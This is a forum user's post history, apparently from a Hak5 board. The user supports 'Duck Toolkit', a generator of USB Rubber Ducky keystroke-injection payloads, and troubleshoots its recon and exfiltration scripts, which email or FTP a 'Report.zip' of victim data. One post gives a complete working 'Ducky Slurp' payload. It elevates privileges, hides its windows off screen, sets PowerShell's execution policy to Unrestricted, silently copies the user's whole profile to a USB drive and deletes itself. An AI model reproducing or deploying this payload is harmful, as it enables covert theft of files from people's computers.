-
Posts
44 -
Joined
-
Last visited
-
Days Won
3
Posts posted by 411Hall
-
-
18 hours ago, monkeytrumpet said:
There's a slight bug in the copy to USB code... ( in my case RECON is my alternative USB drive)
STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq RECON} | Measure
should be
STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'RECON'} | Measure
this can be fixed by putting the destination in '' but this isn't obvious. The same applies if putting a drive letter
All fixed now, thank you for the heads up :)
-
16 hours ago, lilfear1 said:
I am still having the same issue that I was before...this page looked just like the one I used previously (just fyi)
What Language are you using?
ymode will appear when the commands ALT y, DELAY 1000, STRING mode con:cols=14 lines=1 are not recognised.
I have no idea why its saying PowerShell.exe isnt a valid executable. Can run it manually from Windows Key + R?
-
20 hours ago, NinjaDuck said:
Hi
Good work!, any hope for swedish language support?
Thanks! Do any of the other encoders currently support swedish layout? If they do I can just modify it to work with the toolkit
-
Hello everyone. Sorry for the delay in replies and issues with the previous site over the past few months.
I am happy to announce that the DuckToolkit NG is now available!
This is an entirely new version of the previous site which has been rewritten in Python/Django by myself and KevtheHermit.
Current Features:
- Online Encoder
- 30+ Recon/Exploit/Reporting PowerShell scripts
- Online Decoder
- UK/US Language Support
- Standalone Python Encoder/Decoder
We are working to add new languages and to implement Linux/OSX scripts in the coming weeks, however since this in an open source project please feel free to help us! If you want a certain language added then help us by writing it!
You can access the online DuckToolkit NG here:
You can access the standalone DuckToolkit here:
https://github.com/kevthehermit/DuckToolkit
Any issues, comments or suggestions then either post on the Disqus thread on the website or respond in this thread,
411.
-
Sorry for the downtime everyone. The old site is now back up.
I am working on a new site and have moved the old site to a new hosting provider and have had a few issues.
Hoping to have the new site up and running by April! It will be worth the wait!
411.
-
Hi 411, I have a problem similar to Nazgul's a couple of posts above. I would like to use my Ducky for light recon and have it email me a report. It opens and seems to run smooth (just testing Computer Information right now), it writes a .ps1 file to c:\windows but I don't think that I am getting a report.zip. The .ps1 doesn't delete itself and I never get my email. Would you look at my .bin and .txt too?
Hi mate, yeah no worries. Send me the .txt, .bin and .ps1 file and i will have a look. It might also be worth launching the PowerShell.exe on your Windows box, navigating to the .ps1 file and attempting to run it from command line. That will show you if there any errors when it attempts to run.
I will be away for the weekend btw so wont be able to look until Monday.
Cheers,
411.
-
Hi 411,
I just created/corrected some issues that would be corrected in the next SVN for the es.propoerties of the 2.6.3 encoder. c
an you send me a PM with an e-mail where i can send you the es.properties file with the corrections?Version 2.6.4 It´s out ;)Hi Ardetroya, sorry for not replying sooner i have only just seen this post! Do you have a copy of the properties file? I will update asap.
Thanks,
411.
-
Just a heads up.
I have updated the encoder on the Toolkit to 2.6.3. Hoping this will fix the issues users have been having with the Encoder.
Any issues let me know.
411.
-
Yeah sorry about that, appears the site ran out of space even though that should never happen.
Its back up now.
411.
-
This is awesome! As its Java based would you consider some type of collaboration so we could try and get this onto the Duck Toolkit? Obviously full credit would go to you!.
-
I am having an issue creating a working payload ... I am new to the gear so please bear with me :)
I am trying to generate a very simple payload ... Just selecting Comper Info from RECON and Save to target for REPORT ... The Script seems to run fine on the target ... However after the command prompt closes I just have a PowerShell file on my desktop and NO c:\report.zip file .... What am I missing???
Hi nazgul, sorry you are having issues!
Would you mind sending the .txt and .bin payloads to ducktoolkit@outlook.com so i can have a look? There is definitely something wrong as the PowerShell file should be hidden in C:\Windows.
411.
-
Hi xyntax sorry for the delay in my reply. I believe there is an issue with the italian keyboard layout in the latest encoder as you are not the only person to report this to me.
The down arrows are there to pull the notepad off screen. The amount of down arrows required to get the notepad off screen vary depending on screen resolution. Since i dont know the users screen resolution i have included more that should be would probably be necessary to ensure the notepad is always hidden.
411.
-
Nice work, looks really extensive! Havent got my ducky with me know but i will run it as soon as i get chance.
411.
-
Soo did it not run?
What operating system are you running?
411.
-
-
The only payload that has worked is the Hello World payload, the rest will open random files and such.
Have you tried again since i added the new delay feature?
You now choose exactly how much delay is on each script. So maybe try setting it to the max to see if that runs? If it does then it has to be a timing issue.
411.
-
Hi guys!
So I'm deplyoing my Duck at work , and I have a script (Thanks to DuckToolKit) that saves the user and hardware info of their computer. We're doing an inventory basically.
The output of the script saves it as a Report.zip, but I have about 200 computers to go through. Is it possible to have an
IF 'Report.zip'=EXIST
Then EXIST +1
Basically if Report.zip exists , rename the file to Report1, and so on so the final will have Report, Report1, Report 2, etc.
Thanks!! I'll attach my script below:
In response to this yes that wouldn't be a problem at all. I will probably append a time stamp to the report name so 'Report 08:00:00 07.05.2014.zip' That work for you? I will make the changes over the next weekend.
As for PowerShell as Merlintime has pointed out its incredibly powerful and there are loads of ways you can remotely administer machines. When i was writing the Toolkit i discovered loads of awesome uses for it but i decided to leave remotely networked machines out of the scope as there are certain variables i wouldn't know. Anyway i have all of my PowerShell scripts minus the Duck code stored somewhere so if you want them let me know. Also let me know if you write anything you think could be a good payload. Im always looking for new scripts!
411.
-
Hi sorry for the dely in my reply.
So do you ever see notepad open and the script being typed out? If not I am thinking that the delay on the scripts may be too little and therfore the ducky is typing faster than the PC can handle. Let me know, I am working on a solution to this that should be released in a few weeks but there is a work around we can do in the mean time.
411.
-
Used the format without the parentheses of course. Is there a tailing slash required or anything? When I input the FTP URL into a browser it leads me to the Index of / as expected. Shall I PM you the actual URL for the FTP server as its strictly for the use of the Rubber Ducky and does not contain sensitive information as well as the fact that all the information can be simply changed?
Regards
No tailing slashes or anything needed. If you dont mind PMing me the details will probably be the quickest way to sort it.
Sorry about that
411.
-
So I've excitidly recieved my Rubber Ducky Exfiltrator and had a fantastic time loading a payload and running it. I'm slightly familiar with the Teens 3.0 but its been sometime. So my question is, whenever and whatever format I enter into the Send to FTP I always get the error that the input line was incorrect.
The ol
Please ensure all variable fields are correctly filled in.
Please refer to the help section for more information on using the Payload Generator.
The help section wasn't very helpful or I'm very dense.
Please advise as to the "correct" to enter an FTP machine.
The current format I use is as follows.
Regards,
Taco
Sorry about the issues mate. I just tried putting in:
ftp://username:pass@example.com
That worked fine for me. Are you by chance adding brackets on either side? If so don't! Not really too sure why i added to the example tbh so I will remove during next update.
Hope that fixes it.
411.
-
I am having the same problem, and if I try to physically click no or yes the ducky doesn't finish the attack.
this wont let me paste the post this was referring to and I hit quote.....
Anyway the post I am referring to says that when I insert the ducky into my target computer then remove. add another payload on ducky re-insert into same target computer comes up with error saying file already exists (cant think of the file atm sorry) but it goes on to ask if you want to replace it or not. I thought that file would be deleted showing no evidence of even being there. If I hit yes to override it the ducky doesn't finish the attack.
Also on another subject my SD that came with my ducky is also bad I have a 4Gb that seems to work though.
Sorry about that mate. Its exactly what Merlintime said, nice one btw! The PowerShell file which is created when the script is deployed is called config.ps1, this is saved in the C:\Windows folder. The file will erase itself after completion.
So that fact that its still there means the script you run before has either errored or hasn't completed. Have you by chance run the Twin Duck script? I seem to remember that doesn't finish for a very very long time even after alot of the files have been copied to the USB.
Anyway its a simple enough fix. I will make sure that future scripts overwrite the config.ps1 file if its present. Should be able to push the changes out by the weekend.Issue is now fixed.
Thanks for using the Toolkit and sorry about the issues.
411.
-
If your interested I have a slighty different version of the Ducky Slurp. Same premise as Darrens and Overwraiths just written in PowerShell.
DELAY 3000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\' ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select Name ENTER STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name ENTER STRING copy-item $userDir $usbPath.Name -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1500 STRING C:\Windows\config.ps1 ENTER DELAY 2000 ALT F4 DELAY 200 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1000 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER
There is also a USB Reporting method on the Duck Toolkit.
411.
-
Version 2 of the Duck Toolkit is now online!
v.2 Changes:
- New UI
- USB Reporting Payload
- Duck Slurp Payload
- Fixed Encoder Issues
- USB Recon Script Updated
- Fixed Other Backend Issues
Check it out at http://www.ducktoolkit.com
Feedback is always appreciated. Also I really want to get some fresh scripts on the site in the coming weeks so if anyone has any requests just message me.
Enjoy,
411.
-
I'm having trouble with this toolkit's email function. I always try to send all the reconnaissance info to an email address, but it never sends the email to the one i specified.
This is how the menu is setup for email recon (I'm certain you know how it looks anyway)
Reporting Scripts
Email Report via GMAIL
Email address to send report to: (name@gmail.com)
Email Username: (name)
Email Password: (Password123)
For example, the first box I fill in with: cgdcrew@gmail.com
The second box I fill out with: cgdcrew@gmail.com
And then the password for my gmail account.
I download the binary, but the inject.bin into the root of the Ducky, put it onto a test machine that I have, it writes and executes all code, but no email is sent to the specified address.
Is this a bug or am I doing something wrong? Thanks.
Hey mate,
Sorry about that. I have just tested the script and it worked for me, I am assuming you have checked Junk folders etc? (I have to ask)
I think you may be having one of two possible issues:
1. Its possible that either the 'Report.zip' isn't ever being created so it can be uploaded and sent via email, that would cause the script to crash.
2 . SMTP (port 25) may be blocked on your firewall which is preventing the script from being sent. However I have never had this issue and I have tried on several computers with different firewalls etc.
First thing i would try is disabling any firewalls etc and doing a test run, if the email arrives then problem sorted. Although i will need to fix that issue.
If that doesn't work then its probably a 'Report.zip' issue. Could you try making a recon script and select the 'Save Report to Target Machine' option, enter a folder directory for the file to save too and run the script. That will let me know if the zip creation functionality is working on your computer.
Sorry for the issues,
411.
Duck toolkit encoder error
in Classic USB Rubber Ducky
Posted
Try the code below. If your going to use CONTROL ALT with a command after you need to shorten it to CTRL-ALT.
REM Logon DELAY 4000 CTRL-ALT DELETE STRING Computer_Password ENTER DELAY 500 REM Open Website CTRL-ALT a DELAY 500 REM Logon STRING Username TAB STRING Site_Password ENTER DELAY 500 REM Maximize Screen WINDOWS UPARROW